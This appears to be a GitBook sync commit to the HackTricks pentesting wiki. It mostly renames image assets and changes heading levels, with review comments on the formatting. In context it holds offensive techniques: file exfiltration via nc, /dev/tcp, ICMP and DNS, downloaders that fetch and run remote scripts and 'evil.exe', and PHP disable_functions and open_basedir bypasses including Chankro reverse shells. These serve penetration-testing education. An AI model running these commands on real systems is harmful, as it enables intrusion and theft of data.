GitBook: [#3330] No subject

This commit is contained in:
CPol 2022-07-21 20:01:55 +00:00 committed by gitbook-bot
parent 25207a20d2
commit 341a55ff9d
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
28 changed files with 104 additions and 108 deletions

Three binary image assets changed (previews not shown): one added (509 KiB), one replaced (509 KiB before, 96 KiB after), one replaced (96 KiB before, 14 KiB after).

View File

@ -26,7 +26,7 @@ dht udp "DHT Nodes"
![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
InfluxDB
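Review bot: the only change in this hunk is one more ` (1)` appended to an asset name that already carries 28 parenthesised suffixes (`image (345) (2) … (1).png`), and the same pattern repeats in almost every file of this commit. Each sync that does this leaves the previously referenced copy behind unless it is deleted in the same commit, and the paths become impossible to read or diff. Suggest renaming these assets once to a stable slug (for example `dht-nodes.png`) and pointing the reference at that, so later syncs stop rewriting the path.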

View File

@ -58,7 +58,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [Security Hubs](https://securityhubs.io/)
![](<.gitbook/assets/security-hubs-logo\_v1.2 (1).png>)
![](<.gitbook/assets/image (307).png>)
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results.** [**Security Hubs**](https://securityhubs.io/) **** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
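Review bot: this rename drops a descriptive asset name (`security-hubs-logo_v1.2 (1).png`) for a generic one (`image (307).png`), which loses the only hint of what the file is. If the rename is needed, keep a meaningful name such as `security-hubs-logo.png`; otherwise leave the reference as it was.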
@ -75,7 +75,7 @@ Through Security Skills as a Service, we help organizations to **defend against
### [Intigriti](https://www.intigriti.com)
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png>)
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
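Review bot: the Intigriti banner referenced here as `image (620) (2) … (10) (14).png` is the same image that other files in this commit reference as `… (10) (13).png` and `… (10) (16).png`, so the repository is carrying several copies of one logo under different numeric suffixes. Suggest deduplicating to a single asset (for example `intigriti-banner.png`) and pointing every `{% hint %}` block at it, which also stops the suffix growth seen across this commit.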

View File

@ -405,7 +405,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:

View File

@ -65,7 +65,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (3).png>)
An then use the following code

View File

@ -152,7 +152,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (4).png>)
### USB Detective

View File

@ -1,5 +1,7 @@
# Exfiltration
## Exfiltration
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
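Review bot: demoting the page title from `# Exfiltration` to `## Exfiltration` leaves the page without an H1, and the later hunk that turns `# SSHFS` into `## SSHFS` then puts a section at the same level as the title. Suggest keeping `# Exfiltration` for the title and demoting only the sections beneath it.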
@ -16,32 +18,30 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## Copy\&Paste Base64
### Copy\&Paste Base64
#### Linux
**Linux**
```bash
base64 -w0 <file> #Encode file
base64 -d file #Decode file
```
#### Windows
**Windows**
```
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
## HTTP
### HTTP
#### Linux
**Linux**
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
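Review bot: turning `#### Linux` and `#### Windows` into plain `**Linux**` / `**Windows**` removes these entries from the outline and drops their anchors, so any link such as `#linux` into this page stops resolving. If that is intentional it is fine; otherwise keep them as `####` sub-headings under the new `###` sections. The image path change in the same hunk (`(1).png` to `(10) (16).png`) is another instance of the suffix growth noted elsewhere in this commit.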
@ -50,7 +50,7 @@ curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
#### Windows
**Windows**
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
@ -67,11 +67,11 @@ Start-BitsTransfer -Source $url -Destination $output
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
### Upload files
#### Upload files
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
### **HTTPS Server**
#### **HTTPS Server**
```python
# from https://gist.github.com/dergachev/7028596
@ -114,23 +114,23 @@ if __name__ == "__main__":
###
```
## FTP
### FTP
### FTP server (python)
#### FTP server (python)
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
### FTP server (NodeJS)
#### FTP server (NodeJS)
```
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
### FTP server (pure-ftp)
#### FTP server (pure-ftp)
```bash
apt-get update && apt-get install pure-ftp
@ -150,7 +150,7 @@ chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
### **Windows** client
#### **Windows** client
```bash
#Work well with python. With pure-ftp use fusr:ftp
@ -163,14 +163,12 @@ echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## SMB
### SMB
Kali as server
@ -208,7 +206,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
WindPS-2> cd new_disk:
```
## SCP
### SCP
The attacker has to have SSHd running.
@ -216,7 +214,7 @@ The attacker has to have SSHd running.
scp <username>@<Attacker_IP>:<directory>/<filename>
```
# SSHFS
## SSHFS
If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
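Review bot: after this change `## SSHFS` sits one level above its siblings (`### SCP` just before it and `### NC` just after), and at the same level as the page title once it becomes `## Exfiltration`. It should be `### SSHFS` to match the rest of the section headings in this file.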
@ -226,23 +224,23 @@ sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
```
## NC
### NC
```bash
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
```
## /dev/tcp
### /dev/tcp
### Download file from victim
#### Download file from victim
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
### Upload file to victim
#### Upload file to victim
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
@ -253,7 +251,7 @@ cat <&6 > file.txt
thanks to **@BinaryShadow\_**
## **ICMP**
### **ICMP**
```bash
#In order to exfiltrate the content of a file via pings you can do:
@ -273,7 +271,7 @@ def process_packet(pkt):
sniff(iface="tun0", prn=process_packet)
```
## **SMTP**
### **SMTP**
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
@ -281,7 +279,7 @@ If you can send data to an SMTP server, you can create a SMTP to receive the dat
sudo python -m smtpd -n -c DebuggingServer :25
```
## TFTP
### TFTP
By default in XP and 2003 (in others it need to be explicitly added during installation)
@ -307,7 +305,7 @@ In **victim**, connect to the Kali server:
tftp -i <KALI-IP> get nc.exe
```
## PHP
### PHP
Download a file with a PHP oneliner:
@ -315,13 +313,13 @@ Download a file with a PHP oneliner:
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```
## VBScript
### VBScript
```bash
Attacker> python -m SimpleHTTPServer 80
```
#### Victim
**Victim**
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
@ -355,7 +353,7 @@ echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
## Debug.exe
### Debug.exe
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
@ -373,16 +371,14 @@ wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
## DNS
### DNS
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
<details>

View File

@ -23,7 +23,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -78,7 +78,7 @@ There are also several tools that can perform **automatic vulnerabilities assess
In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.**
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -165,7 +165,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

View File

@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">****\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">****\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
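Review bot: both the old and the new `<img …>` line end with a stray empty-emphasis `****` before the trailing backslash; the hunk only swaps the image suffix and carries the artifact through. Since the line is being touched anyway, drop the `****` so it matches the identical hint blocks in the other files of this commit, which end with `alt="" data-size="original">\`.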
@ -792,7 +792,7 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
Bettercap broadcast WSD packets searching for services (UDP Port 3702).
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

View File

@ -343,7 +343,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png>)
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (6).png>)
{% hint style="info" %}
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\

View File

@ -146,7 +146,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate (from APNS)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### Step 6: Profile Installation

View File

@ -241,7 +241,7 @@ In this case you could try to abuse the functionality creating a web with the fo
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (436) (1) (1).png>)
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).
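Review bot: this is the one asset reference in the commit whose suffix gets shorter (`image (436) (1) (1) (1).png` to `image (436) (1) (1).png`) rather than longer. Confirm that the shorter-named file actually exists after this commit, or that the corresponding binary rename is part of it; otherwise this image will not render.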

View File

@ -731,7 +731,7 @@ You can collect console logs through the Xcode **Devices** window as follows:
5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png>)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

View File

@ -19,7 +19,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -249,7 +249,7 @@ Entry_5:
```
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

View File

@ -90,11 +90,11 @@ Now that we know which kind of information is saved inside the database, let's t
In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object.
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>)
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below:
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>)
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
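Review bot: the three screenshot references are changed from the original file names (`Screenshot from 2021-03-13 18-17-48.png` and friends) to slug form (`screenshot-from-2021-03-13-18-17-48.png`). The binary changes listed at the top of this commit are not named, so please confirm the three PNGs are renamed in the same commit; if only the markdown changed, all three images break. Also note the context line reads "composed by **name** and .**value**", where the period belongs after `value`.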
@ -217,7 +217,7 @@ Or even **relations of several different objects using aliases**:
In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case):
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>)
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
@ -277,7 +277,7 @@ Below you can find the simplest demonstration of an application authentication r
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
![](<../../.gitbook/assets/image (119) (2).png>)
![](<../../.gitbook/assets/image (119) (1).png>)
## CSRF in GraphQL
@ -312,6 +312,7 @@ Also, abusing a [**XS-Search**](../../pentesting-web/xs-search.md) **attack** mi
For more information **check the** [**original post here**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html).
## Authorization in GraphQL
Many GraphQL functions defined on the endpoint might only check the authentication of the requester but not authorization.
Modifying query input variables could lead to sensitive account details [leaked](https://hackerone.com/reports/792927).
@ -327,6 +328,7 @@ Mutation could even lead to account take over trying to modify other account dat
```
## Leaked GraphQL Structures
If introspection is disabled, try looking at the website source code. The queries are often pre loaded into browser as javascript libraries. These prewritten queries can reveal powerful information about the schema and use of each object and function. The `Sources` tab of the developer tools can search all files to enumerate where the queries are saved. Sometimes even the administrator protected queries are already exposed.
```javascript

View File

@ -338,7 +338,7 @@ C:\xampp\tomcat\conf\server.xml
If you see an error like the following one:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png>)
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10).png>)
It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.

View File

@ -1,4 +1,4 @@
# PHP - Useful Functions & disable\_functions/open\_basedir bypass
<details>
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## PHP Command & Code Execution
# PHP Command & Code Execution
## PHP Command Execution
### PHP Command Execution
**exec** - Returns last line of commands output
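Review bot: this hunk promotes `## PHP Command & Code Execution` to `#`, which makes it a second H1 on a page that already has `# PHP - Useful Functions & disable_functions/open_basedir bypass` as its title, while every other former top-level section in this diff goes the opposite way (`# disable_functions & open_basedir` becomes `##`, `# open_basedir Bypass` becomes `##`, and so on). The next heading then jumps straight to `### PHP Command Execution`, skipping H2. Suggest `## PHP Command & Code Execution` with `### PHP Command Execution` and `### PHP Code Execution` beneath it, consistent with the rest of the file.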
@ -83,7 +82,7 @@ file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA
**dl** - This function can be used to dynamically load a PHP extension. This function won't be present always, so you should check if it's available before trying to exploit it. Read[ this page to learn how to exploit this function](disable\_functions-bypass-dl-function.md).
## PHP Code Execution
### PHP Code Execution
Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.\
**${\<php code>}** - If your input gets reflected in any PHP string, it will be executed.\
@ -101,7 +100,7 @@ Apart from eval there are other ways to execute PHP code: include/require can be
**$func->invokeArgs(array());**\
**serialize/unserialize**
# disable\_functions & open\_basedir
## disable\_functions & open\_basedir
**Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid** the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access.\
The PHP setting sue to be configured in the path _/etc/php7/conf.d_ or similar.
@ -112,12 +111,12 @@ Both configuration can be seen in the output of **`phpinfo()`**:
![](<../../../../.gitbook/assets/image (347).png>)
# open\_basedir Bypass
## open\_basedir Bypass
`open_basedir` will configure the folders that PHP can access, you **won't be able to to write/read/execute any file outside** those folders, but also you **won't even be able to list** other directories.\
However, if somehow you are able to execute arbitrary PHP code you can **try** the following chunk of **codes** to try to **bypass** the restriction.
## Listing dirs with glob:// bypass
### Listing dirs with glob:// bypass
In this first example the `glob://` protocol with some path bypass is used:
@ -142,7 +141,7 @@ foreach($file_list as $f){
**Note2**: It looks like part of the code is duplicated, but that's actually necessary!\
**Note3**: This example is only useful to list folders not to read files
## Full open\_basedir bypass abusing FastCGI
### Full open\_basedir bypass abusing FastCGI
If you want to **learn more about PHP-FPM and FastCGI** you can read the [first section of this page](disable\_functions-bypass-php-fpm-fastcgi.md).\
If **`php-fpm`** is configured you can abuse it to completely bypass **open\_basedir**:
@ -505,7 +504,7 @@ echo $client->request($params, $code)."\n";
?>
```
This scripts will communicate with **unix socket of php-fpm** (usually located in /var/run if fpm is used) to execute arbitrary code. The `open_basedir` settings will be overwritten by the **PHP\_VALUE** attribute that is sent.\
This scripts will communicate with **unix socket of php-fpm** (usually located in /var/run if fpm is used) to execute arbitrary code. The `open_basedir` settings will be overwritten by the **PHP\_VALUE** attribute that is sent.\
Note how `eval` is used to execute the PHP code you send inside the **cmd** parameter.\
Also note the **commented line 324**, you can uncomment it and the **payload will automatically connect to the given URL and execute the PHP code** contained there.\
Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` to get the content of the `/etc/passwd` file.
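Review bot: the removed and added lines beginning "This scripts will communicate with **unix socket of php-fpm**" are byte-identical as displayed, and the same happens in the next hunk with "If you manage have PHP code executing inside a machine". The change is invisible here (trailing whitespace or an escaped line-ending backslash), which makes the diff noisy for no visible gain; if it is whitespace normalisation, say so in the commit message. While the sentence is being rewritten, "This scripts" should read "This script", and "If you manage have PHP code" should read "If you manage to have PHP code".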
@ -514,24 +513,24 @@ Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/p
You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting.
{% endhint %}
# disable\_functions Bypass
## disable\_functions Bypass
If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\
If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\
So, lets see how you can bypass this restriction (if you can)
## Automatic bypass discovery
### Automatic bypass discovery
You can use the tool [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser) and it will indicate you which technique you can use to bypass `disable_functions`.
## Bypassing using other system functions
### Bypassing using other system functions
Just return to the begging of this page and **check if any of the command executing functions isn't disabled and available in the environment**. If you find just 1 of them, you will be able to use it to execute arbitrary system commands.
## LD\_PRELOAD bypass
### LD\_PRELOAD bypass
It's well known that some functions in PHP like `mail()`are going to **execute binaries inside the system**. Therefore, you can abuse them using the environment variable `LD_PRELOAD` to make them load an arbitrary library that can execute anything.
### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
#### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
1. `mail`
2. `mb_send_mail` : If your system has `php-mbstring` module installed then this function can be used to bypass php disable\_functions.
@ -557,10 +556,10 @@ uid_t getuid(void){
}
```
### Bypass using Chankro
#### Bypass using Chankro
In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit** that you need to upload to the vulnerable server and execute it (access it via web).\
**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the**`LD_PRELOAD` trick + PHP `mail()`** function to execute the reverse shell.
**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the\*\*`LD_PRELOAD` trick + PHP `mail()`\*\* function to execute the reverse shell.
Note that in order to use **Chankro**, `mail` and `putenv` **cannot appear inside the `disable_functions` list**.\
In the following example you can see how to **create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro\_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit** is going to be called **bicho.php** (that's the file you need to upload to the victims server):
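Review bot: the added line escapes the bold markers (`the\*\*\`LD_PRELOAD\` trick + PHP \`mail()\`\*\*`), so the rendered page will now show literal asterisks instead of bold text. The root cause is visible in the removed line: `the**\`LD_PRELOAD\`` has no space between `the` and `**`, so the opening marker never parsed as emphasis and the sync escaped it. Fix the source instead of escaping it: `will use the **\`LD_PRELOAD\` trick + PHP \`mail()\`** function`. Also "victims disc" should read "victim's disk".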
@ -583,7 +582,7 @@ python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php
If you find that **mail** function is blocked by disabled functions, you may still be able to use the function **mb\_send\_mail.**\
More information about this technique and Chankro here: [https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/)
## "Bypass" using PHP capabilities
### "Bypass" using PHP capabilities
Note that using **PHP** you can **read and write files, create directories and change permissions**.\
You can even **dump databases**.\
